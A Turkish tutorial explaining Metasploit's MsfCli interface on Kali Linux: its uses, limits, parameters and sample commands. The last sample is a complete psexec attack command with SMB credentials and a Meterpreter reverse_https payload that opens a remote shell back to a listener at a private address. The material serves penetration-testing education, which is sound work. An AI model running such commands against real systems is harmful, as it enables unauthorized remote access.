Metasploit Framework, Kali Linux üzerinde “/usr/share/metasploit-framework” altında toplanmıştır.
cd /usr/share/metasploit-framework
ls -la
Kullanım Amaçları
MsfCli, MsfConsole ile yapılabilecek işlemleri tek bir satırda / adımda gerçekleştiren arayüzdür. Başlıca kullanım amaçları aşağıdaki gibidir:
- Exploit ve Auxiliary modülleri çalıştırmak
- Tek bir satırda tüm işlemleri gerçekleştirerek öğrenim kolaylığı sağlamak
- Yeni exploit’ler test etmek ve geliştirmek
- İnteraktif erişimin mümkün olmadığı durumlarda kullanmak
- Exploit işlerinde betiklerle otomatik işlemler gerçekleştirmek
- Tek seferlik exploit işlemlerini daha hızlı gerçekleştirmek
- Hangi exploit veya payload kullanılacağı bilindiği durumlarda hız kazanmak
Kısıtları
MsfCli arayüzünün başlıca dezavantajları aşağıdaki gibi listelenebilir.
- MsfConsole arayüzü kadar desteklenmemektedir.
- Aynı anda sadece tek bir kabuk (shell) açılabildiği için istemci taraflı saldırılarda çok da pratik değildir.
- MsfConsole tarafından sunulan bazı gelişmiş özellikleri desteklememektedir.
Önemli Parametreleri
MsfCli arayüzünde kullanılabilecek önemli parametreler aşağıdaki gibi listelenebilir:
- -h veya H: Yardımcı dokümantasyon sunar.
- -E: Seçilen modülü çalıştırır.
- P: Seçilen modül için uygun Payload değerlerini sunar.
- O: Seçilen modül için uygun seçenekleri sunar. Böylece hangi seçeneklerin ayarlanabileceği listelenir.
Kullanımı
MsfCli kullanımında, seçenek / parametre ataması sırasında msfconsole arayüzünde atama işlemindeki ” “(boşluk) kullanılması yerine, “=” (eşittir) kullanılır. Ayrıca parametrelerin büyük/küçük harf duyarlı olduğu da göz önünde bulundurulmalıdır.
Örnek Kullanımlar
MsfCli arayüzü ile çalıştırılabilecek bazı örnek komutlar aşağıdaki gibi listelenebilir.
- msfcli -h
- msfcli exploit/multi/samba/usermap_script O
- msfcli exploit/multi/samba/usermap_script P
- msfcli exploit/windows/smb/psexec RHOST=192.168.2.182 PAYLOAD=windows/meterpreter/reverse_https LHOST=192.168.2.97 LPORT=443 SMBUser=Tubitak SMBPass=Aa123456 E